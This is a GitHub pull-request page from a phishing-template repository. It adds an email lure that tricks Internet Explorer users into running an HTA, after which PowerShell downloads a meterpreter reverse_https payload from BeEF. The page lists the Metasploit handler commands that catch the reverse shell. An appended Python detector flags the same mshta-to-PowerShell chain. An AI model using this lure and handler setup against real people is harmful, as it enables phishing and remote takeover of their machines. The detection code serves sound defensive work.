pentestgeek / phishing-frenzy-templates

Phishing Scenarios Used for Phishing Frenzy

Added new HTA-powershell email template (use it with BeEF's HTA_powershell module) #1

Closed antisnatchor closed 10 years ago

antisnatchor commented 10 years ago

Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into a hidden IFrame via BeEF (see social_engineering->hta_powershell module).

The payload is obviously Internet Explorer only (and on Windows targets with PowerShell installed, so from Windows Vista to more recent versions like 7 and 8). If the user allows execution, PowerShell is used to download the payload (by @mattifestation) from BeEF.

The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.

Before launching the module, do the following on Metasploit:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z
```

Enjoy!
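Added example, not part of the original pull request or the project's code: the process chain described above (Internet Explorer opens an HTA, which starts PowerShell to download a payload) can be flagged in process-creation telemetry. The events, the Sysmon Event ID 1 style field names and the download cues below are constructed assumptions.

```python
import ntpath

# Constructed process-creation events (Sysmon Event ID 1 field names); not from the page.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 4,
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\SysWOW64\mshta.exe"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.EXE",
     "CommandLine": "powershell.exe (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/p')"},
    {"ProcessId": 400, "ParentProcessId": 50,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ProcessId": 500, "ParentProcessId": 60,
     "Image": r"C:\Windows\System32\mshta.exe"},
    {"ProcessId": 600, "ParentProcessId": 500,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Tools\inventory.ps1"},
]

# Assumed generic download cues; not taken from the BeEF module.
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "downloaddata", "invoke-webrequest")

def exe(event):
    """Lower-cased executable name of an event, '' when the event or field is missing."""
    return ntpath.basename((event or {}).get("Image", "")).lower()

def detect(events):
    """Return (pid, severity, chain) for every PowerShell process started by mshta.exe."""
    by_pid = {e["ProcessId"]: e for e in events if "ProcessId" in e}
    hits = []
    for e in events:
        parent = by_pid.get(e.get("ParentProcessId"))
        if exe(e) != "powershell.exe" or exe(parent) != "mshta.exe":
            continue
        grandparent = by_pid.get(parent.get("ParentProcessId"))
        chain = [n for n in (exe(grandparent), "mshta.exe", "powershell.exe") if n]
        cmd = e.get("CommandLine", "").lower()
        from_browser = exe(grandparent) == "iexplore.exe"
        downloads = any(cue in cmd for cue in DOWNLOAD_CUES)
        severity = "high" if from_browser and downloads else "medium"
        hits.append((e.get("ProcessId"), severity, " > ".join(chain)))
    return hits

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

On real telemetry, key the lookup on Sysmon's `ProcessGuid`/`ParentProcessGuid` rather than PIDs, which are reused over time.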

zeknox commented 10 years ago

merged 56e823aa7c0ba2f82398d7b322ea27b36f9cd7cb